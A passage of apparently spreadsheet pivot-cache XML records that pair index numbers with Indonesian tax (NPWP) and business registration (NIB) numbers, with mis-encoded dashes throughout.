    <s v="91‚Äì460‚Äì067‚Äì1‚Äì901‚Äì000"/>
  </r>
  <r>
    <x v="1571"/>
    <s v="nib"/>
    <n v="9120002560856"/>
  </r>
  <r>
    <x v="1572"/>
    <s v="npwp"/>
    <s v="01‚Äì309‚Äì254‚Äì9‚Äì624‚Äì001"/>
  </r>
  <r>
    <x v="1572"/>
    <s v="nib"/>
    <n v="8120105702565"/>
  </r>
  <r>
    <x v="1573"/>
    <s v="npwp"/>
    <s v="80‚Äì530‚Äì979‚Äì6‚Äì723‚Äì000"/>
  </r>
  <r>
    <x v="1573"/>
    <s v="nib"/>
    <n v="8120218160954"/>
  </r>
  <r>
    <x v="1574"/>
    <s v="nib"/>
    <n v="9120205642313"/>
  </r>
  <r>
    <x v="1575"/>
    <s v="npwp"/>
    <s v="03‚Äì097‚Äì661‚Äì7‚Äì823‚Äì000"/>
  </r>
  <r>
    <x v="1575"/>
    <s v="nib"/>
    <n v="9120004790112"/>
  </r>
  <r>
    <x v="1576"/>
    <s v="npwp"/>
    <s v="73‚Äì782‚Äì043‚Äì1‚Äì402‚Äì000"/>
  </r>
  <r>
    <x v="1576"/>
    <s v="nib"/>
    <n v="9120102141378"/>
  </r>
  <r>
    <x v="1577"/>
    <s v="npwp"/>
    <s v="74‚Äì844‚Äì016‚Äì1‚Äì219‚Äì000"/>
  </r>
  <r>
    <x v="1577"/>
    <s v="nib"/>
    <n v="1292000441358"/>
  </r>
  <r>
    <x v="1578"/>
    <s v="npwp"/>
    <s v="01‚Äì409‚Äì482‚Äì5‚Äì723‚Äì000"/>
  </r>
  <r>
    <x v="1578"/>
    <s v="nib"/>
    <n v="8120110120799"/>
  </r>
  <r>
    <x v="1579"/>
    <s v="npwp"/>
    <s v="01‚Äì876‚Äì267‚Äì4‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1579"/>
    <s v="nib"/>
    <n v="8120008991245"/>
  </r>
  <r>
    <x v="1580"/>
    <s v="npwp"/>
    <s v="46‚Äì516‚Äì864‚Äì9‚Äì915‚Äì000"/>
  </r>
  <r>
    <x v="1580"/>
    <s v="nib"/>
    <n v="9120109322796"/>
  </r>
  <r>
    <x v="1581"/>
    <s v="npwp"/>
    <s v="85‚Äì612‚Äì520‚Äì6‚Äì701‚Äì000"/>
  </r>
  <r>
    <x v="1581"/>
    <s v="nib"/>
    <n v="9120208111204"/>
  </r>
  <r>
    <x v="1582"/>
    <s v="npwp"/>
    <s v="06‚Äì742‚Äì259‚Äì2‚Äì821‚Äì000"/>
  </r>
  <r>
    <x v="1582"/>
    <s v="nib"/>
    <n v="9120205551132"/>
  </r>
  <r>
    <x v="1583"/>
    <s v="npwp"/>
    <s v="90‚Äì559‚Äì791‚Äì0‚Äì047‚Äì000"/>
  </r>
  <r>
    <x v="1583"/>
    <s v="nib"/>
    <n v="9120202350912"/>
  </r>
  <r>
    <x v="1584"/>
    <s v="npwp"/>
    <s v="03‚Äì206‚Äì389‚Äì3‚Äì609‚Äì000"/>
  </r>
  <r>
    <x v="1584"/>
    <s v="nib"/>
    <n v="8120205921472"/>
  </r>
  <r>
    <x v="1585"/>
    <s v="npwp"/>
    <s v="01‚Äì807‚Äì688‚Äì5‚Äì031‚Äì000"/>
  </r>
  <r>
    <x v="1585"/>
    <s v="nib"/>
    <n v="8120301800617"/>
  </r>
  <r>
    <x v="1586"/>
    <s v="npwp"/>
    <s v="90‚Äì452‚Äì484‚Äì0‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1586"/>
    <s v="nib"/>
    <n v="9120205292081"/>
  </r>
  <r>
    <x v="1587"/>
    <s v="npwp"/>
    <s v="72‚Äì643‚Äì025‚Äì9‚Äì831‚Äì000"/>
  </r>
  <r>
    <x v="1587"/>
    <s v="nib"/>
    <n v="9120103192646"/>
  </r>
  <r>
    <x v="1588"/>
    <s v="npwp"/>
    <s v="02‚Äì020‚Äì024‚Äì2‚Äì823‚Äì000"/>
  </r>
  <r>
    <x v="1588"/>
    <s v="nib"/>
    <n v="9120103522781"/>
  </r>
  <r>
    <x v="1589"/>
    <s v="npwp"/>
    <s v="08‚Äì662‚Äì504‚Äì3‚Äì612‚Äì000"/>
  </r>
  <r>
    <x v="1589"/>
    <s v="nib"/>
    <n v="9120200142648"/>
  </r>
  <r>
    <x v="1590"/>
    <s v="npwp"/>
    <s v="82‚Äì407‚Äì440‚Äì5‚Äì214‚Äì000"/>
  </r>
  <r>
    <x v="1590"/>
    <s v="nib"/>
    <n v="9120109492154"/>
  </r>
  <r>
    <x v="1591"/>
    <s v="npwp"/>
    <s v="90‚Äì571‚Äì747‚Äì6‚Äì071‚Äì000"/>
  </r>
  <r>
    <x v="1591"/>
    <s v="nib"/>
    <n v="9120108480688"/>
  </r>
  <r>
    <x v="1592"/>
    <s v="npwp"/>
    <s v="90‚Äì526‚Äì648‚Äì2‚Äì614‚Äì000"/>
  </r>
  <r>
    <x v="1592"/>
    <s v="nib"/>
    <n v="9120006362118"/>
  </r>
  <r>
    <x v="1593"/>
    <s v="npwp"/>
    <s v="03‚Äì149‚Äì384‚Äì4‚Äì019‚Äì000"/>
  </r>
  <r>
    <x v="1593"/>
    <s v="nib"/>
    <n v="8120102802506"/>
  </r>
  <r>
    <x v="1594"/>
    <s v="npwp"/>
    <n v="316685486655000"/>
  </r>
  <r>
    <x v="1594"/>
    <s v="nib"/>
    <n v="9120304172131"/>
  </r>
  <r>
    <x v="1595"/>
    <s v="npwp"/>
    <s v="81‚Äì013‚Äì235‚Äì7‚Äì325‚Äì000"/>
  </r>
  <r>
    <x v="1595"/>
    <s v="nib"/>
    <n v="5470174"/>
  </r>
  <r>
    <x v="1596"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1596"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1597"/>
    <s v="npwp"/>
    <s v="70‚Äì772‚Äì600‚Äì6‚Äì202‚Äì000"/>
  </r>
  <r>
    <x v="1597"/>
    <s v="nib"/>
    <n v="9120303490449"/>
  </r>
  <r>
    <x v="1598"/>
    <s v="npwp"/>
    <s v="03.105.852.2-643.000"/>
  </r>
  <r>
    <x v="1598"/>
    <s v="nib"/>
    <n v="8120009892077"/>
  </r>
  <r>
    <x v="1599"/>
    <s v="npwp"/>
    <s v="02‚Äì750‚Äì763‚Äì1‚Äì086‚Äì000"/>
  </r>
  <r>
    <x v="1599"/>
    <s v="nib"/>
    <n v="8120101830372"/>
  </r>
  <r>
    <x v="1600"/>
    <s v="npwp"/>
    <s v="74‚Äì610‚Äì661‚Äì6‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1600"/>
    <s v="nib"/>
    <n v="9120405201923"/>
  </r>
  <r>
    <x v="1601"/>
    <s v="npwp"/>
    <s v="91‚Äì249‚Äì304‚Äì6‚Äì324‚Äì000"/>
  </r>
  <r>
    <x v="1601"/>
    <s v="nib"/>
    <n v="9120202472456"/>
  </r>
  <r>
    <x v="1602"/>
    <s v="npwp"/>
    <s v="91‚Äì601‚Äì001‚Äì0‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1602"/>
    <s v="nib"/>
    <n v="9120107502331"/>
  </r>
  <r>
    <x v="1603"/>
    <s v="npwp"/>
    <s v="01‚Äì821‚Äì310‚Äì8‚Äì059‚Äì000"/>
  </r>
  <r>
    <x v="1603"/>
    <s v="nib"/>
    <n v="8120004831746"/>
  </r>
  <r>
    <x v="1604"/>
    <s v="npwp"/>
    <s v="72‚Äì001‚Äì195‚Äì6‚Äì214‚Äì000"/>
  </r>
  <r>
    <x v="1604"/>
    <s v="nib"/>
    <n v="9120200312873"/>
  </r>
  <r>
    <x v="1605"/>
    <s v="npwp"/>
    <s v="91‚Äì095‚Äì225‚Äì8‚Äì225‚Äì000"/>
  </r>
  <r>
    <x v="1605"/>
    <s v="nib"/>
    <n v="9120004490796"/>
  </r>
  <r>
    <x v="1606"/>
    <s v="npwp"/>
    <s v="91‚Äì199‚Äì104‚Äì0‚Äì455‚Äì000"/>
  </r>
  <r>
    <x v="1606"/>
    <s v="nib"/>
    <n v="9120001482408"/>
  </r>
  <r>
    <x v="1607"/>
    <s v="npwp"/>
    <s v="01‚Äì278‚Äì337‚Äì9‚Äì325‚Äì000"/>
  </r>
  <r>
    <x v="1607"/>
    <s v="nib"/>
    <n v="8120000870519"/>
  </r>
  <r>
    <x v="1608"/>
    <s v="nib"/>
    <n v="8120000711862"/>
  </r>
  <r>
    <x v="1609"/>
    <s v="npwp"/>
    <s v="02‚Äì682‚Äì022‚Äì5‚Äì047‚Äì000"/>
  </r>
  <r>
    <x v="1609"/>
    <s v="nib"/>
    <n v="8120005861765"/>
  </r>
  <r>
    <x v="1610"/>
    <s v="npwp"/>
    <s v="21‚Äì038‚Äì082‚Äì0‚Äì503‚Äì000"/>
  </r>
  <r>
    <x v="1610"/>
    <s v="nib"/>
    <n v="8120002792833"/>
  </r>
  <r>
    <x v="1611"/>
    <s v="npwp"/>
    <s v="01‚Äì792‚Äì896‚Äì1‚Äì624‚Äì000"/>
  </r>
  <r>
    <x v="1611"/>
    <s v="nib"/>
    <n v="9120200551261"/>
  </r>
  <r>
    <x v="1612"/>
    <s v="npwp"/>
    <s v="74‚Äì719‚Äì423‚Äì1‚Äì617‚Äì001"/>
  </r>
  <r>
    <x v="1612"/>
    <s v="nib"/>
    <n v="8120002762444"/>
  </r>
  <r>
    <x v="1613"/>
    <s v="npwp"/>
    <s v="01‚Äì876‚Äì267‚Äì4‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1613"/>
    <s v="nib"/>
    <n v="8120008991245"/>
  </r>
  <r>
    <x v="1614"/>
    <s v="npwp"/>
    <s v="02‚Äì469‚Äì876‚Äì3‚Äì805‚Äì000"/>
  </r>
  <r>
    <x v="1614"/>
    <s v="nib"/>
    <n v="1275001451363"/>
  </r>
  <r>
    <x v="1615"/>
    <s v="npwp"/>
    <s v="02‚Äì753‚Äì614‚Äì3‚Äì732‚Äì000"/>
  </r>
  <r>
    <x v="1616"/>
    <s v="nib"/>
    <n v="8120315120371"/>
  </r>
  <r>
    <x v="1617"/>
    <s v="npwp"/>
    <s v="86‚Äì881‚Äì473‚Äì2‚Äì809‚Äì000"/>
  </r>
  <r>
    <x v="1617"/>
    <s v="nib"/>
    <n v="8120114221673"/>
  </r>
  <r>
    <x v="1618"/>
    <s v="npwp"/>
    <s v="91‚Äì235‚Äì733‚Äì2‚Äì941‚Äì000"/>
  </r>
  <r>
    <x v="1618"/>
    <s v="nib"/>
    <n v="9120007522659"/>
  </r>
  <r>
    <x v="1619"/>
    <s v="npwp"/>
    <s v="74‚Äì301‚Äì202‚Äì3‚Äì545‚Äì000"/>
  </r>
  <r>
    <x v="1620"/>
    <s v="npwp"/>
    <s v="90‚Äì620‚Äì199‚Äì1‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="1620"/>
    <s v="nib"/>
    <n v="9120303490181"/>
  </r>
  <r>
    <x v="1621"/>
    <s v="npwp"/>
    <s v="04‚Äì097‚Äì930‚Äì4‚Äì213‚Äì000"/>
  </r>
  <r>
    <x v="1621"/>
    <s v="nib"/>
    <n v="9120205192585"/>
  </r>
  <r>
    <x v="1622"/>
    <s v="npwp"/>
    <s v="71‚Äì356‚Äì473‚Äì3‚Äì213‚Äì000"/>
  </r>
  <r>
    <x v="1622"/>
    <s v="nib"/>
    <n v="9120108521309"/>
  </r>
  <r>
    <x v="1623"/>
    <s v="npwp"/>
    <s v="85‚Äì765‚Äì423‚Äì0‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1623"/>
    <s v="nib"/>
    <n v="9120105291536"/>
  </r>
  <r>
    <x v="1624"/>
    <s v="npwp"/>
    <s v="02‚Äì192‚Äì968‚Äì2‚Äì057‚Äì000"/>
  </r>
  <r>
    <x v="1624"/>
    <s v="nib"/>
    <n v="9120201461227"/>
  </r>
  <r>
    <x v="1625"/>
    <s v="npwp"/>
    <s v="01‚Äì061‚Äì076‚Äì4‚Äì093‚Äì000"/>
  </r>
  <r>
    <x v="1625"/>
    <s v="nib"/>
    <n v="8120110232884"/>
  </r>
  <r>
    <x v="1626"/>
    <s v="npwp"/>
    <s v="02.565.592.9-955.000"/>
  </r>
  <r>
    <x v="1626"/>
    <s v="nib"/>
    <n v="9120104311548"/>
  </r>
  <r>
    <x v="1627"/>
    <s v="npwp"/>
    <s v="06‚Äì548‚Äì860‚Äì3‚Äì951‚Äì000"/>
  </r>
  <r>
    <x v="1627"/>
    <s v="nib"/>
    <n v="8120118251535"/>
  </r>
  <r>
    <x v="1628"/>
    <s v="npwp"/>
    <s v="76‚Äì718‚Äì962‚Äì4‚Äì225‚Äì000"/>
  </r>
  <r>
    <x v="1628"/>
    <s v="nib"/>
    <n v="8120015210138"/>
  </r>
  <r>
    <x v="1629"/>
    <s v="npwp"/>
    <s v="01‚Äì542‚Äì473‚Äì2‚Äì046‚Äì000"/>
  </r>
  <r>
    <x v="1629"/>
    <s v="nib"/>
    <n v="8120215042226"/>
  </r>
  <r>
    <x v="1630"/>
    <s v="nib"/>
    <n v="9120300271913"/>
  </r>
  <r>
    <x v="1631"/>
    <s v="npwp"/>
    <s v="86‚Äì897‚Äì692‚Äì9‚Äì503‚Äì000"/>
  </r>
  <r>
    <x v="1631"/>
    <s v="nib"/>
    <n v="9120006180941"/>
  </r>
  <r>
    <x v="1632"/>
    <s v="npwp"/>
    <s v="01‚Äì876‚Äì267‚Äì4‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1632"/>
    <s v="nib"/>
    <n v="8120008991245"/>
  </r>
  <r>
    <x v="1633"/>
    <s v="npwp"/>
    <s v="02‚Äì017‚Äì235‚Äì9‚Äì812‚Äì000"/>
  </r>
  <r>
    <x v="1633"/>
    <s v="nib"/>
    <n v="8120214270364"/>
  </r>
  <r>
    <x v="1634"/>
    <s v="npwp"/>
    <s v="73‚Äì519‚Äì702‚Äì2‚Äì543‚Äì000"/>
  </r>
  <r>
    <x v="1635"/>
    <s v="npwp"/>
    <s v="31.684.434.9-807.001"/>
  </r>
  <r>
    <x v="1635"/>
    <s v="nib"/>
    <n v="9120202111174"/>
  </r>
  <r>
    <x v="1636"/>
    <s v="npwp"/>
    <s v="70‚Äì940‚Äì277‚Äì0‚Äì605‚Äì000"/>
  </r>
  <r>
    <x v="1636"/>
    <s v="nib"/>
    <n v="8120118051996"/>
  </r>
  <r>
    <x v="1637"/>
    <s v="npwp"/>
    <s v="01‚Äì996‚Äì232‚Äì3‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="1637"/>
    <s v="nib"/>
    <n v="8120007862386"/>
  </r>
  <r>
    <x v="1638"/>
    <s v="npwp"/>
    <s v="02‚Äì437‚Äì344‚Äì1‚Äì215‚Äì000"/>
  </r>
  <r>
    <x v="1638"/>
    <s v="nib"/>
    <n v="8120009820988"/>
  </r>
  <r>
    <x v="1639"/>
    <s v="npwp"/>
    <s v="75‚Äì685‚Äì880‚Äì9‚Äì524‚Äì000"/>
  </r>
  <r>
    <x v="1639"/>
    <s v="nib"/>
    <n v="8120314033009"/>
  </r>
  <r>
    <x v="1640"/>
    <s v="npwp"/>
    <s v="02‚Äì637‚Äì999‚Äì0‚Äì603‚Äì000"/>
  </r>
  <r>
    <x v="1640"/>
    <s v="nib"/>
    <n v="8120009991788"/>
  </r>
  <r>
    <x v="1641"/>
    <s v="npwp"/>
    <s v="01‚Äì832‚Äì681‚Äì9‚Äì805‚Äì000"/>
  </r>
  <r>
    <x v="1641"/>
    <s v="nib"/>
    <n v="9120004122468"/>
  </r>
  <r>
    <x v="1642"/>
    <s v="npwp"/>
    <s v="86‚Äì941‚Äì356‚Äì7‚Äì503‚Äì000"/>
  </r>
  <r>
    <x v="1642"/>
    <s v="nib"/>
    <n v="9120101120539"/>
  </r>
  <r>
    <x v="1643"/>
    <s v="npwp"/>
    <s v="02‚Äì318‚Äì292‚Äì6‚Äì953‚Äì000"/>
  </r>
  <r>
    <x v="1643"/>
    <s v="nib"/>
    <n v="8120312093118"/>
  </r>
  <r>
    <x v="1644"/>
    <s v="npwp"/>
    <s v="02‚Äì919‚Äì715‚Äì9‚Äì823‚Äì000"/>
  </r>
  <r>
    <x v="1644"/>
    <s v="nib"/>
    <n v="8120100950352"/>
  </r>
  <r>
    <x v="1645"/>
    <s v="npwp"/>
    <s v="01‚Äì454‚Äì019‚Äì9‚Äì801‚Äì001"/>
  </r>
  <r>
    <x v="1645"/>
    <s v="nib"/>
    <n v="8120202990554"/>
  </r>
  <r>
    <x v="1646"/>
    <s v="npwp"/>
    <s v="03‚Äì040‚Äì252‚Äì3‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="1646"/>
    <s v="nib"/>
    <n v="9120200750341"/>
  </r>
  <r>
    <x v="1647"/>
    <s v="npwp"/>
    <s v="85‚Äì703‚Äì987‚Äì9‚Äì606‚Äì000"/>
  </r>
  <r>
    <x v="1647"/>
    <s v="nib"/>
    <n v="9120600832223"/>
  </r>
  <r>
    <x v="1648"/>
    <s v="nib"/>
    <n v="9120202520281"/>
  </r>
  <r>
    <x v="1649"/>
    <s v="npwp"/>
    <s v="81‚Äì521‚Äì928‚Äì2‚Äì412‚Äì000"/>
  </r>
  <r>
    <x v="1649"/>
    <s v="nib"/>
    <n v="8120002762174"/>
  </r>
  <r>
    <x v="1650"/>
    <s v="npwp"/>
    <s v="66‚Äì682‚Äì242‚Äì4‚Äì614‚Äì000"/>
  </r>
  <r>
    <x v="1650"/>
    <s v="nib"/>
    <n v="9120304852083"/>
  </r>
  <r>
    <x v="1651"/>
    <s v="npwp"/>
    <s v="81‚Äì672‚Äì109‚Äì6‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1651"/>
    <s v="nib"/>
    <n v="9120002372532"/>
  </r>
  <r>
    <x v="1652"/>
    <s v="npwp"/>
    <s v="31‚Äì734‚Äì437‚Äì2‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1652"/>
    <s v="nib"/>
    <n v="9120203371929"/>
  </r>
  <r>
    <x v="1653"/>
    <s v="npwp"/>
    <s v="03‚Äì022‚Äì357‚Äì2‚Äì024‚Äì000"/>
  </r>
  <r>
    <x v="1653"/>
    <s v="nib"/>
    <n v="9120204761722"/>
  </r>
  <r>
    <x v="1654"/>
    <s v="npwp"/>
    <s v="01‚Äì658‚Äì848‚Äì5‚Äì914‚Äì000"/>
  </r>
  <r>
    <x v="1655"/>
    <s v="npwp"/>
    <s v="01‚Äì454‚Äì019‚Äì9‚Äì325‚Äì001"/>
  </r>
  <r>
    <x v="1655"/>
    <s v="nib"/>
    <n v="8120202990554"/>
  </r>
  <r>
    <x v="1656"/>
    <s v="npwp"/>
    <s v="02‚Äì939‚Äì256‚Äì0‚Äì942‚Äì000"/>
  </r>
  <r>
    <x v="1656"/>
    <s v="nib"/>
    <n v="9120200751151"/>
  </r>
  <r>
    <x v="1657"/>
    <s v="npwp"/>
    <s v="87‚Äì615‚Äì409‚Äì7‚Äì033‚Äì000"/>
  </r>
  <r>
    <x v="1657"/>
    <s v="nib"/>
    <n v="9120200131714"/>
  </r>
  <r>
    <x v="1658"/>
    <s v="npwp"/>
    <s v="01‚Äì918‚Äì334‚Äì2‚Äì651‚Äì000"/>
  </r>
  <r>
    <x v="1658"/>
    <s v="nib"/>
    <n v="9120200560125"/>
  </r>
  <r>
    <x v="1659"/>
    <s v="npwp"/>
    <s v="81‚Äì582‚Äì257‚Äì2‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="1659"/>
    <s v="nib"/>
    <n v="9120008153805"/>
  </r>
  <r>
    <x v="1660"/>
    <s v="npwp"/>
    <s v="21‚Äì123‚Äì080‚Äì0‚Äì603‚Äì001"/>
  </r>
  <r>
    <x v="1660"/>
    <s v="nib"/>
    <n v="9120202122356"/>
  </r>
  <r>
    <x v="1661"/>
    <s v="npwp"/>
    <s v="90‚Äì681‚Äì328‚Äì2‚Äì305‚Äì000"/>
  </r>
  <r>
    <x v="1661"/>
    <s v="nib"/>
    <n v="53705"/>
  </r>
  <r>
    <x v="1662"/>
    <s v="npwp"/>
    <s v="81‚Äì582‚Äì257‚Äì2‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="1662"/>
    <s v="nib"/>
    <n v="9120008153805"/>
  </r>
  <r>
    <x v="1663"/>
    <s v="npwp"/>
    <s v="02‚Äì032‚Äì738‚Äì3‚Äì812‚Äì000"/>
  </r>
  <r>
    <x v="1663"/>
    <s v="nib"/>
    <n v="8120117231894"/>
  </r>
  <r>
    <x v="1664"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1664"/>
    <s v="nib"/>
    <n v="9120007191461"/>
  </r>
  <r>
    <x v="1665"/>
    <s v="npwp"/>
    <s v="75‚Äì652‚Äì491‚Äì4‚Äì507‚Äì000"/>
  </r>
  <r>
    <x v="1665"/>
    <s v="nib"/>
    <n v="8120102982914"/>
  </r>
  <r>
    <x v="1666"/>
    <s v="npwp"/>
    <s v="83‚Äì761‚Äì870‚Äì1‚Äì723‚Äì000"/>
  </r>
  <r>
    <x v="1666"/>
    <s v="nib"/>
    <n v="8120013080134"/>
  </r>
  <r>
    <x v="1667"/>
    <s v="npwp"/>
    <s v="02‚Äì938‚Äì305‚Äì6‚Äì603‚Äì000"/>
  </r>
  <r>
    <x v="1667"/>
    <s v="nib"/>
    <n v="9120203171273"/>
  </r>
  <r>
    <x v="1668"/>
    <s v="npwp"/>
    <s v="31‚Äì639‚Äì342‚Äì0‚Äì507‚Äì000"/>
  </r>
  <r>
    <x v="1668"/>
    <s v="nib"/>
    <n v="9120500741471"/>
  </r>
  <r>
    <x v="1669"/>
    <s v="npwp"/>
    <s v="31‚Äì428‚Äì280‚Äì7‚Äì418‚Äì000"/>
  </r>
  <r>
    <x v="1669"/>
    <s v="nib"/>
    <n v="8120201753118"/>
  </r>
  <r>
    <x v="1670"/>
    <s v="npwp"/>
    <s v="01‚Äì061‚Äì076‚Äì4‚Äì093‚Äì000"/>
  </r>
  <r>
    <x v="1670"/>
    <s v="nib"/>
    <n v="8120106861339"/>
  </r>
  <r>
    <x v="1671"/>
    <s v="npwp"/>
    <s v="01‚Äì666‚Äì894‚Äì9‚Äì701‚Äì000"/>
  </r>
  <r>
    <x v="1671"/>
    <s v="nib"/>
    <n v="8120011130168"/>
  </r>
  <r>
    <x v="1672"/>
    <s v="npwp"/>
    <s v="06‚Äì548‚Äì860‚Äì3‚Äì951‚Äì000"/>
  </r>
  <r>
    <x v="1672"/>
    <s v="nib"/>
    <n v="8120118251535"/>
  </r>
  <r>
    <x v="1673"/>
    <s v="npwp"/>
    <s v="81‚Äì640‚Äì457‚Äì8‚Äì112‚Äì000"/>
  </r>
  <r>
    <x v="1673"/>
    <s v="nib"/>
    <n v="8120207830991"/>
  </r>
  <r>
    <x v="1674"/>
    <s v="npwp"/>
    <s v="76‚Äì301‚Äì729‚Äì0‚Äì643‚Äì000"/>
  </r>
  <r>
    <x v="1674"/>
    <s v="nib"/>
    <n v="8120109832893"/>
  </r>
  <r>
    <x v="1675"/>
    <s v="npwp"/>
    <s v="01‚Äì233‚Äì064‚Äì3‚Äì631‚Äì000"/>
  </r>
  <r>
    <x v="1675"/>
    <s v="nib"/>
    <n v="8120119251191"/>
  </r>
  <r>
    <x v="1676"/>
    <s v="npwp"/>
    <s v="86‚Äì319‚Äì701‚Äì8‚Äì913‚Äì001"/>
  </r>
  <r>
    <x v="1676"/>
    <s v="nib"/>
    <n v="9120202702147"/>
  </r>
  <r>
    <x v="1677"/>
    <s v="npwp"/>
    <s v="06‚Äì613‚Äì114‚Äì5‚Äì426‚Äì000"/>
  </r>
  <r>
    <x v="1677"/>
    <s v="nib"/>
    <n v="9120006632355"/>
  </r>
  <r>
    <x v="1678"/>
    <s v="npwp"/>
    <s v="71‚Äì379‚Äì961‚Äì0‚Äì727‚Äì000"/>
  </r>
  <r>
    <x v="1679"/>
    <s v="npwp"/>
    <s v="81‚Äì753‚Äì163‚Äì5‚Äì416‚Äì000"/>
  </r>
  <r>
    <x v="1679"/>
    <s v="nib"/>
    <n v="8120014201883"/>
  </r>
  <r>
    <x v="1680"/>
    <s v="npwp"/>
    <s v="80‚Äì634‚Äì541‚Äì9‚Äì723‚Äì000"/>
  </r>
  <r>
    <x v="1680"/>
    <s v="nib"/>
    <n v="8120213260972"/>
  </r>
  <r>
    <x v="1681"/>
    <s v="npwp"/>
    <s v="85‚Äì059‚Äì563‚Äì8‚Äì047‚Äì000"/>
  </r>
  <r>
    <x v="1681"/>
    <s v="nib"/>
    <n v="8120015010259"/>
  </r>
  <r>
    <x v="1682"/>
    <s v="npwp"/>
    <s v="90‚Äì250‚Äì262‚Äì4‚Äì018‚Äì000"/>
  </r>
  <r>
    <x v="1682"/>
    <s v="nib"/>
    <n v="9120003102948"/>
  </r>
  <r>
    <x v="1683"/>
    <s v="npwp"/>
    <s v="70‚Äì403‚Äì324‚Äì0‚Äì941‚Äì000"/>
  </r>
  <r>
    <x v="1683"/>
    <s v="nib"/>
    <n v="9120200161673"/>
  </r>
  <r>
    <x v="1684"/>
    <s v="npwp"/>
    <s v="02‚Äì638‚Äì777‚Äì9‚Äì941‚Äì001"/>
  </r>
  <r>
    <x v="1684"/>
    <s v="nib"/>
    <n v="8120312042393"/>
  </r>
  <r>
    <x v="1685"/>
    <s v="npwp"/>
    <s v="76‚Äì840‚Äì075‚Äì6‚Äì821‚Äì000"/>
  </r>
  <r>
    <x v="1685"/>
    <s v="nib"/>
    <n v="9120009782425"/>
  </r>
  <r>
    <x v="1686"/>
    <s v="npwp"/>
    <s v="90‚Äì293‚Äì348‚Äì0‚Äì112‚Äì000"/>
  </r>
  <r>
    <x v="1686"/>
    <s v="nib"/>
    <n v="9120204200489"/>
  </r>
  <r>
    <x v="1687"/>
    <s v="npwp"/>
    <s v="74‚Äì076‚Äì484‚Äì0‚Äì723‚Äì000"/>
  </r>
  <r>
    <x v="1687"/>
    <s v="nib"/>
    <n v="9120104611733"/>
  </r>
  <r>
    <x v="1688"/>
    <s v="npwp"/>
    <s v="02‚Äì592‚Äì206‚Äì3‚Äì201‚Äì000"/>
  </r>
  <r>
    <x v="1688"/>
    <s v="nib"/>
    <n v="9120105492633"/>
  </r>
  <r>
    <x v="1689"/>
    <s v="npwp"/>
    <s v="72‚Äì677‚Äì628‚Äì9‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1689"/>
    <s v="nib"/>
    <n v="9120202270979"/>
  </r>
  <r>
    <x v="1690"/>
    <s v="npwp"/>
    <s v="71‚Äì472‚Äì929‚Äì0‚Äì648‚Äì000"/>
  </r>
  <r>
    <x v="1690"/>
    <s v="nib"/>
    <n v="8120010190684"/>
  </r>
  <r>
    <x v="1691"/>
    <s v="npwp"/>
    <s v="90‚Äì318‚Äì513‚Äì0‚Äì427‚Äì000"/>
  </r>
  <r>
    <x v="1691"/>
    <s v="nib"/>
    <n v="9120302261036"/>
  </r>
  <r>
    <x v="1692"/>
    <s v="npwp"/>
    <s v="01‚Äì914‚Äì865‚Äì9‚Äì057‚Äì000"/>
  </r>
  <r>
    <x v="1693"/>
    <s v="npwp"/>
    <s v="83‚Äì132‚Äì586‚Äì5‚Äì435‚Äì000"/>
  </r>
  <r>
    <x v="1693"/>
    <s v="nib"/>
    <n v="8120019031079"/>
  </r>
  <r>
    <x v="1694"/>
    <s v="npwp"/>
    <s v="75‚Äì652‚Äì491‚Äì4‚Äì507‚Äì000"/>
  </r>
  <r>
    <x v="1694"/>
    <s v="nib"/>
    <n v="8120102982914"/>
  </r>
  <r>
    <x v="1695"/>
    <s v="npwp"/>
    <s v="72‚Äì579‚Äì838‚Äì3‚Äì518‚Äì000"/>
  </r>
  <r>
    <x v="1695"/>
    <s v="nib"/>
    <n v="9120009161379"/>
  </r>
  <r>
    <x v="1696"/>
    <s v="npwp"/>
    <s v="92‚Äì189‚Äì030‚Äì7‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1696"/>
    <s v="nib"/>
    <n v="9120506701473"/>
  </r>
  <r>
    <x v="1697"/>
    <s v="npwp"/>
    <s v="74‚Äì889‚Äì389‚Äì8‚Äì614‚Äì000"/>
  </r>
  <r>
    <x v="1697"/>
    <s v="nib"/>
    <n v="9120007372181"/>
  </r>
  <r>
    <x v="1698"/>
    <s v="npwp"/>
    <s v="02‚Äì807‚Äì473‚Äì8‚Äì613‚Äì000"/>
  </r>
  <r>
    <x v="1698"/>
    <s v="nib"/>
    <n v="9120218152675"/>
  </r>
  <r>
    <x v="1699"/>
    <s v="npwp"/>
    <s v="81‚Äì900‚Äì450‚Äì8‚Äì604‚Äì000"/>
  </r>
  <r>
    <x v="1699"/>
    <s v="nib"/>
    <n v="8120006911784"/>
  </r>
  <r>
    <x v="1700"/>
    <s v="npwp"/>
    <s v="76‚Äì457‚Äì680‚Äì7‚Äì643‚Äì000"/>
  </r>
  <r>
    <x v="1700"/>
    <s v="nib"/>
    <n v="8120101932873"/>
  </r>
  <r>
    <x v="1701"/>
    <s v="npwp"/>
    <s v="01‚Äì658‚Äì848‚Äì5‚Äì914‚Äì000"/>
  </r>
  <r>
    <x v="1701"/>
    <s v="nib"/>
    <n v="9120005461005"/>
  </r>
  <r>
    <x v="1702"/>
    <s v="npwp"/>
    <s v="31‚Äì486‚Äì986‚Äì8‚Äì619‚Äì000"/>
  </r>
  <r>
    <x v="1702"/>
    <s v="nib"/>
    <n v="9120206132554"/>
  </r>
  <r>
    <x v="1703"/>
    <s v="npwp"/>
    <s v="90‚Äì511‚Äì639‚Äì8‚Äì701‚Äì000"/>
  </r>
  <r>
    <x v="1703"/>
    <s v="nib"/>
    <n v="9120505880381"/>
  </r>
  <r>
